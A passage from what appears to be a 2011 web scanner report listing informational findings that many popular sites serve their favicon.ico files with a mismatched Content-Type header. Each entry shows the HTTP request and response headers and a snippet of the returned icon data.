Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qualityhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 22 Nov 2008 02:06:45 GMT
ETag: "57e-45c3d9d14f740"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d961f070061ac0000; path=/; domain=www.qualityhealth.com

..............h.......(....... ........................................}g......mT.......p.K........lR..........v_..........w`......rY.......{......hN.....=.............................................
...[SNIP]...
27.172. http://www.radaronline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radaronline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radaronline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Expires: Sat, 02 Apr 2011 13:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:28 GMT; path=/
Vary: User-Agent

The requested file favicon.ico was not found.
27.173. http://www.rawtube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rawtube.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rawtube.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Jul 2010 19:59:31 GMT
ETag: "9472-47e-48bff5b44cec0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:30 GMT
X-Varnish: 863747183 863502929
Age: 971
Via: 1.1 varnish
Connection: keep-alive

............ .h.......(....... ..... .............................................................................................................mm..........................00........................
...[SNIP]...
27.174. http://www.real.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.real.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.real.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:42 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 17:43:29 GMT
ETag: "47e-49104ea9e9240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Connection: close

............ .h.......(....... ..... ............................................    0..........x.................................................c.    .Y...V..E'    ...........................................
...[SNIP]...
27.175. http://www.rei.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rei.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rei.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 May 2008 17:54:55 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/plain; charset=UTF-8
Content-Language: en-US
Cache-Control: public, must-revalidate, max-age=86400
Date: Sat, 02 Apr 2011 13:55:40 GMT
Content-Length: 1406
Connection: close

..............h.......(....... ...........@...........................s.s.*b*.............T{T.....<k<.....c.c.............HqH. Y .........3f3.........o.o...Y|Y.&^&.............FoF.q.q...............
...[SNIP]...
27.176. http://www.rollingstone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rollingstone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 12:23:33 GMT
ETag: "130116e-37e-49f8a03173b40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Server: Apache (Unix;)
Cache-Control: private, max-age=575
Date: Sat, 02 Apr 2011 13:55:16 GMT
Connection: close

..............h.......(....... ...............................!.. ..!..!..!.....!..!........#.....!..-*............. ........ ..!..!..".."........up.......... ..!..-*.\U.XU.[T.XU.VU.,). ..#..uq.......
...[SNIP]...
27.177. http://www.rottentomatoes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rottentomatoes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rottentomatoes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:06 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:24:02 GMT
ETag: "423e"
Accept-Ranges: bytes
Content-Length: 16958
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:06 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

......@@.... .(B......(...@......... ......B......................................................................................................................... ...@............................
...[SNIP]...
27.178. http://www.rushlimbaugh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rushlimbaugh.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rushlimbaugh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 19:42:22 GMT
ETag: "72e410-3aee-9bc96380"
Accept-Ranges: bytes
Content-Length: 15086
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:47 GMT
Connection: close

..............h...6... ..............00.......%..F...(....... ..... .....@.............................................................................................................O..e..o...7C...
...[SNIP]...
27.179. http://www.salon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.salon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Last-Modified: Mon, 14 Sep 2009 06:24:07 GMT
ETag: "2fe"
Accept-Ranges: bytes
Content-Length: 766
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:40:16 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...... ..............(... ...@...............................................FEF.............uvu.?A..+-+.om...... ......[\[...................................................33333333.wy30...33333333
...[SNIP]...
27.180. http://www.samsung.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.samsung.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.samsung.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 16
Date: Sat, 02 Apr 2011 13:43:30 GMT
Connection: close

Object not found
27.181. http://www.shutterfly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:59 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2862-1172715710000"
Last-Modified: Thu, 01 Mar 2007 02:21:50 GMT
Content-Length: 2862
Set-Cookie: lb=0FEyVLc8-app224; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1802571948.20480.0000; path=/
Content-Type: text/plain

..............(...6...........h...^......... .h.......(....... ................................................................................................."......n.`.f`...........................
...[SNIP]...
27.182. http://www.smarter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:06 GMT
Server: Apache
Static-Dir-Bind: favicon.ico, /mezi/sites/smarter.com/code/web/, /
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:32:06 GMT
ETag: "f7215d6dbffe11f8f95ff64b3024678c"
Loader-Time-Used: 0.00091
Vary: Accept-Encoding,User-Agent
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ...................................I...@\V.NWS.,20.6=:.-20.D...B...9ja.M...D...BJG.LUQ.F...G...B...L...<OJ.?|q.@HE.@...G...H...$3/.G.y.>FC.N...Bjb.*PI.J....ID.E...L...<D
...[SNIP]...
27.183. http://www.smugmug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smugmug.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smugmug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 23 Apr 2010 05:27:32 GMT
ETag: "13e-484e0af187900"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:37:20 GMT
Connection: close

..............(.......(....... ...............H...H...................DBD.....$"$.....dbd.............TRT.....424.....trt..w..wwwwwwwwww.{w.{w{w...ww{wy
].g.w{0.{}.w{w.ww{..ww.www.gw..w{wq..w0a....w{q
...[SNIP]...
27.184. http://www.songlyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.songlyrics.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songlyrics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:05 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 4286
Cache-Control: max-age=21600, public
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... .........i...i...........cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.aS
...[SNIP]...
27.185. http://www.sony.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sony.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "16c320-37e-9232ec80"
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:50:43 GMT
Last-Modified: Thu, 20 Apr 2006 18:02:10 GMT
Content-Length: 894
Connection: keep-alive

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
27.186. http://www.space.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.space.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.space.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:36 GMT
Last-Modified: Wed, 12 Jan 2011 18:34:49 GMT
ETag: "1ecab-e36-499aa74bee440"
Accept-Ranges: bytes
Content-Length: 3638
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSf4ec54=d0677b7b7d61b86ff3a6c5f1eca230d7971b76fb1a1987004d972dd8; Path=/

..............h...&... ..............(....... ...........@...................................>>>.^^^.....................MMM.qqq.........333.(((.........hhh.UUU.........EEE.yyy.....................##
...[SNIP]...
27.187. http://www.spanishdict.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.spanishdict.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spanishdict.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
ETag: "47e-4716b1c97ea80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2792000
Expires: Wed, 04 May 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@....................l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..i$..i$..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l
...[SNIP]...
27.188. http://www.squidoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.squidoo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.squidoo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Jul 2009 20:00:41 GMT
ETag: "6b81abb-37e-46ff1c2180c40"
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 12:43:59 GMT
X-Varnish: 1788366282 1788098071
Age: 3683
Via: 1.1 varnish
Connection: keep-alive

..............h.......(....... ...............#...#.......................................................................................................................]h.y~.uVTUb:]................
...[SNIP]...
27.189. http://www.staples.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.staples.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staples.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:25:20 GMT
Connection: close
Set-Cookie: zipcode=20001; expires=Fri, 28-Mar-2031 13:25:20 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present

File not found
27.190. http://www.suite101.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suite101.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:42 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Last-Modified: Fri, 25 Jun 2010 21:13:03 GMT
ETag: "1f79678-47e-489e13c8775c0"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a6259:0; expires=Sat, 02-Apr-11 13:01:38 GMT; path=/

............ .h.......(....... ..... .........................................?...........9..C........*..{....+...............................V..'........O..d....U...(...    ...a.........................
...[SNIP]...
27.191. http://www.supercheats.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:57 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 11:41:12 GMT
ETag: "488834421c600"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .........................................................................................


.........................................................


.$$$.rrr...
...[SNIP]...
27.192. http://www.tagged.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tagged.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:06 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 16:40:44 GMT
ETag: "7f2bb0-57e-488c3ccdedb00"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .......................................PPP.ddd.........ppp.NNN.........ooo.@@@.........................000...............................................................
...[SNIP]...
27.193. http://www.takkle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.takkle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.takkle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:08 GMT
Server: Apache/2.2.3 (Oracle)
Accept-Ranges: bytes
ETag: W/"1406-1294350392000"
Last-Modified: Thu, 06 Jan 2011 21:46:32 GMT
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ............................................#+..+4..........7C...................
..{...............JZ......Tf..^r......<I......-6..........................q...=K.......
...[SNIP]...
27.194. http://www.talkingpointsmemo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.talkingpointsmemo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.talkingpointsmemo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 13:26:20 GMT
ETag: "7a4d55-47e-4729836649700"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...
27.195. http://www.techsupportforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.techsupportforum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techsupportforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:15 GMT
Server: Apache
Last-Modified: Sun, 30 Jan 2011 20:13:55 GMT
ETag: "294000b-140-49b15f04c66c0"
Accept-Ranges: bytes
Content-Length: 320
Content-Type: text/plain; charset=UTF-8

GIF89a...................~.}g.@c.8`.7b.8lydh.:i.=d./f.3e.4q.Pt.jsjnyfovju|pe..e./f./e.1c.0j.5l.8k.8n.<p.>r.Bp.Hv.Mz.Sv.Sp.Oz.Xs.Yx.^p.Ym.\Wt:~.{.....m.E.a}.ayws..................GGG................
...[SNIP]...
27.196. http://www.thedailybeast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:58:05 GMT
ETag: "dc48eb-37e-7a435940"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:10 GMT
Connection: close

..............h.......(....... ..................................++."!....##.((..!..........(%.(%......................VV..........yy....nr........-.tr.vu...................64.GG...............TT.rs.
...[SNIP]...
27.197. http://www.thefrisky.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thefrisky.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefrisky.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 Nov 2008 05:00:00 GMT
ETag: "1ad322-37e-45b76de425400"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=70094
Date: Sat, 02 Apr 2011 13:33:13 GMT
Connection: close
Vary: Accept-Encoding

..............h.......(....... ................................&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.)D.(C.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&BMgzp...&B.&B
...[SNIP]...
27.198. http://www.tinypic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tinypic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tinypic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:27 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 29 Jan 2008 14:46:30 GMT
ETag: "57e-7d731d80"
Accept-Ranges: bytes
Content-Length: 1406
Age: 2
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq02:80 (squid)

..............h.......(....... ................................C...F...I...`1..h2..u<..vU..xU..{U..|U..~U...\...d...`...L...b...N...O...Q...k...m...t...U...o...q...s...u...\...\...{...{...]...}...~...
...[SNIP]...
27.199. http://www.tomshardware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tomshardware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tomshardware.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sun, 27 Mar 2011 00:18:07 GMT
Server: Apache
Last-Modified: Thu, 06 Sep 2007 15:38:14 GMT
ETag: "4ae3ab-57e-439794f790580"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Content-Type: text/plain
Age: 22420
X-Cache: HIT from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: keep-alive

..............h.......(....... ...........................................hhh.................**..666.....,++.888.............OOO..
.pop.............{{{.........................IID.........aa`.baa.~~
...[SNIP]...
27.200. http://www.toptenreviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toptenreviews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toptenreviews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:37 GMT
Server: Apache
Last-Modified: Wed, 16 Jan 2008 17:05:31 GMT
ETag: "6a4057-13e-443d9eaacccc0"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

..............(.......(....... ...................................{....{..{{....{.{.{..{{.....{{{.............................DDDDDDDDHwwwwww.@..pxE..@tDuDDDT@tHtEDTD@tGTG.tD@tGDH..D@tGDG.tDH.GDw.wDDD
...[SNIP]...
27.201. http://www.trulia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trulia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
